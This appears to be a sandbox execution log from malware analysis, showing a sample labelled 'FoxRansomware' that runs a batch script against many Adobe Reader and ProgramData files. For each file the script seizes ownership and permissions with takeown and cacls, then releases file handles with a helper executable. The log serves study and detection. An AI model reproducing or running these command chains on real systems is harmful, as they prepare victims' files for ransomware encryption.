C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵PID:2284
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C3⤵PID:3036
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵PID:1548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner3⤵PID:1752
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner4⤵PID:1708
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:800
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""2⤵PID:2088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C3⤵PID:1964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"3⤵PID:2236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "can129.hsp" -nobanner3⤵PID:1652
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "can129.hsp" -nobanner4⤵PID:1656
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2392
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""2⤵PID:1452
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C3⤵PID:2948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"3⤵
- Modifies file permissions
PID:3040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "icudt26l.dat" -nobanner3⤵PID:2700
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "icudt26l.dat" -nobanner4⤵PID:1872
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵PID:2820
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C3⤵PID:2252
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵PID:2460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "ROMANIAN.TXT" -nobanner3⤵PID:2788
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵PID:2716
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:852
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵PID:812
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵PID:1712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵
- Modifies file permissions
PID:3156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CP1258.TXT" -nobanner3⤵PID:356
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CP1258.TXT" -nobanner4⤵PID:3356
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3368
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:3400
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:3440
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2448
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "background.png" -nobanner3⤵PID:3452
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "background.png" -nobanner4⤵PID:3488
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3492
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""2⤵PID:3528
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C3⤵PID:3192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "tasks.xml" -nobanner3⤵PID:3216
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "tasks.xml" -nobanner4⤵PID:3240
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat""2⤵PID:3292
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C3⤵PID:3220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat"3⤵PID:3328
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "qmgr0.dat" -nobanner3⤵PID:3468
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "qmgr0.dat" -nobanner4⤵PID:3180
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3308
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""2⤵PID:3296
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C3⤵PID:2932
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"3⤵
- Modifies file permissions
PID:5408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "ended_review_or_form.gif" -nobanner3⤵PID:3548
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "ended_review_or_form.gif" -nobanner4⤵PID:3796
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""2⤵PID:3244
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C3⤵PID:3864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"3⤵PID:3652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "reviewers.gif" -nobanner3⤵PID:3884
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "reviewers.gif" -nobanner4⤵PID:2136
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3836
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""2⤵PID:3748
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C3⤵PID:3936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"3⤵PID:3812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "server_lg.gif" -nobanner3⤵PID:2844
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "server_lg.gif" -nobanner4⤵PID:3660
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3048
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""2⤵PID:4148
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C3⤵PID:3580
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"3⤵PID:3908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "turnOnNotificationInTray.gif" -nobanner3⤵PID:3892
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "turnOnNotificationInTray.gif" -nobanner4⤵PID:3896
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""2⤵PID:3692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C3⤵PID:3712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"3⤵
- Modifies file permissions
PID:3772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "MinionPro-Bold.otf" -nobanner3⤵PID:3608
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "MinionPro-Bold.otf" -nobanner4⤵PID:3632
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""2⤵PID:4332
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C3⤵PID:3784
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"3⤵PID:3996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "zy______.pfm" -nobanner3⤵PID:3956
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "zy______.pfm" -nobanner4⤵PID:4000
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""2⤵PID:4292
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C3⤵PID:4176
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"3⤵PID:4200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "brt.fca" -nobanner3⤵PID:4216
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "brt.fca" -nobanner4⤵PID:4236
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""2⤵PID:4244
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C3⤵PID:4264
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"3⤵PID:4044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "eng.hyp" -nobanner3⤵PID:4060
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "eng.hyp" -nobanner4⤵PID:4052
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4312
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""2⤵PID:4032
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C3⤵PID:4472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"3⤵PID:3980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "zdingbat.txt" -nobanner3⤵PID:4500
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "zdingbat.txt" -nobanner4⤵PID:2348
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4356
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""2⤵PID:4380
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C3⤵PID:4392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"3⤵PID:4420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "TURKISH.TXT" -nobanner3⤵PID:4400
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "TURKISH.TXT" -nobanner4⤵PID:4652
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""2⤵PID:4428
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C3⤵PID:4608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"3⤵PID:4600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "LogTransport2.exe" -nobanner3⤵PID:4448
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "LogTransport2.exe" -nobanner4⤵PID:4496
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""2⤵PID:4548
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C3⤵PID:4556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"3⤵PID:4756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "bl.gif" -nobanner3⤵PID:4792
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "bl.gif" -nobanner4⤵PID:4768
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""2⤵PID:4824
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C3⤵PID:4764
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"3⤵
- Modifies file permissions
PID:4752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "forms_super.gif" -nobanner3⤵PID:4760
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "forms_super.gif" -nobanner4⤵PID:4888
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""2⤵PID:4796
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C3⤵PID:4944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"3⤵
- Modifies file permissions
PID:4952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "review_browser.gif" -nobanner3⤵PID:4964
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "review_browser.gif" -nobanner4⤵PID:4996
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5024
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""2⤵PID:4936
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C3⤵PID:5060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"3⤵PID:5104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "tl.gif" -nobanner3⤵PID:5132
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "tl.gif" -nobanner4⤵PID:5108
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""2⤵PID:5056
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:5160
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "Identity-V" -nobanner3⤵PID:5200
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "Identity-V" -nobanner4⤵PID:5204
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5144
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""2⤵PID:5284
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C3⤵PID:5312
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"3⤵PID:5288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "MyriadPro-Bold.otf" -nobanner3⤵PID:5336
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "MyriadPro-Bold.otf" -nobanner4⤵PID:5324
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5252
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""2⤵PID:6656
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C3⤵PID:5884
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"3⤵
- Modifies file permissions
PID:6684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "SC_Reader.exe" -nobanner3⤵PID:6688
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "SC_Reader.exe" -nobanner4⤵PID:5264
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6700
-
-
-
